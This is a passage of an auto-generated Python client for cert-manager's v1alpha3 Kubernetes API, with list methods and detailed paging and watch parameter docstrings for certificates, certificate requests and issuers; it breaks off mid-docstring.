:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag, and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in the apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (down to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and it ensures that a client using limit to receive smaller chunks of a very large result can see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_certificate_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
def list_certificate_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""list_certificate_for_all_namespaces # noqa: E501
list objects of kind Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_certificate_for_all_namespaces_with_http_info(async_req=True)
>>> result = thread.get()
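A hedged sketch of unpacking the full response tuple with a (connection, read) timeout pair (values are illustrative):
>>> # 3.05s connection timeout, 27s read timeout
>>> data, status, headers = api.list_certificate_for_all_namespaces_with_http_info(
...     _request_timeout=(3.05, 27))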
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag, and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in the apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (down to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and it ensures that a client using limit to receive smaller chunks of a very large result can see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data only, without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'pretty',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_certificate_for_all_namespaces" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/certificates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_certificate_request_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_certificate_request_for_all_namespaces # noqa: E501
list objects of kind CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_certificate_request_for_all_namespaces(async_req=True)
>>> result = thread.get()
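A hedged sketch filtering by a field selector (assumes `api` is an instance of this API class; the selector value is illustrative):
>>> # restrict the result to a single namespace via fieldSelector
>>> reqs = api.list_certificate_request_for_all_namespaces(
...     field_selector='metadata.namespace=default')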
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag, and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in the apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (down to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and it ensures that a client using limit to receive smaller chunks of a very large result can see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequestList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_certificate_request_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
def list_certificate_request_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""list_certificate_request_for_all_namespaces # noqa: E501
list objects of kind CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_certificate_request_for_all_namespaces_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag, and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in the apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (down to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and it ensures that a client using limit to receive smaller chunks of a very large result can see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data only, without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequestList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'pretty',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_certificate_request_for_all_namespaces" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/certificaterequests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequestList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
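
    # Illustrative usage sketch, not part of the generated client: it assumes
    # this class has been instantiated as `api` on a configured ApiClient, and
    # unpacks the tuple return shape documented in the docstring above.
    #
    #   data, status, headers = \
    #       api.list_certificate_request_for_all_namespaces_with_http_info()
    #   print(status, headers.get('Content-Type'), len(data.items))
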
def list_cluster_issuer(self, **kwargs): # noqa: E501
"""list_cluster_issuer # noqa: E501
list objects of kind ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cluster_issuer(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
        :param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
        :param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuerList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_cluster_issuer_with_http_info(**kwargs) # noqa: E501
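
    # A minimal synchronous call sketch, assuming an `api` instance of this
    # class; `load_kube_config` is the standard kubernetes-python helper, and
    # the class name used below is hypothetical.
    #
    #   from kubernetes import config
    #   config.load_kube_config()
    #   api = CertManagerIoV1alpha3Api()  # hypothetical name for this class
    #   for issuer in api.list_cluster_issuer().items:
    #       print(issuer.metadata.name)
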
def list_cluster_issuer_with_http_info(self, **kwargs): # noqa: E501
"""list_cluster_issuer # noqa: E501
list objects of kind ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cluster_issuer_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
        :param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
        :param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :param _return_http_data_only: return the response data only, without
                                       the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuerList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'pretty',
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuerList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
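
    # Sketch of reading the raw payload by disabling preloading, per the
    # `_preload_content` note above; the tuple shape is assumed to match the
    # usual openapi-generator behaviour when `_return_http_data_only` is unset.
    #
    #   raw, status, headers = api.list_cluster_issuer_with_http_info(
    #       _preload_content=False)
    #   body_bytes = raw.data  # undecoded urllib3/RESTResponse payload
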
def list_issuer_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_issuer_for_all_namespaces # noqa: E501
list objects of kind Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_issuer_for_all_namespaces(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
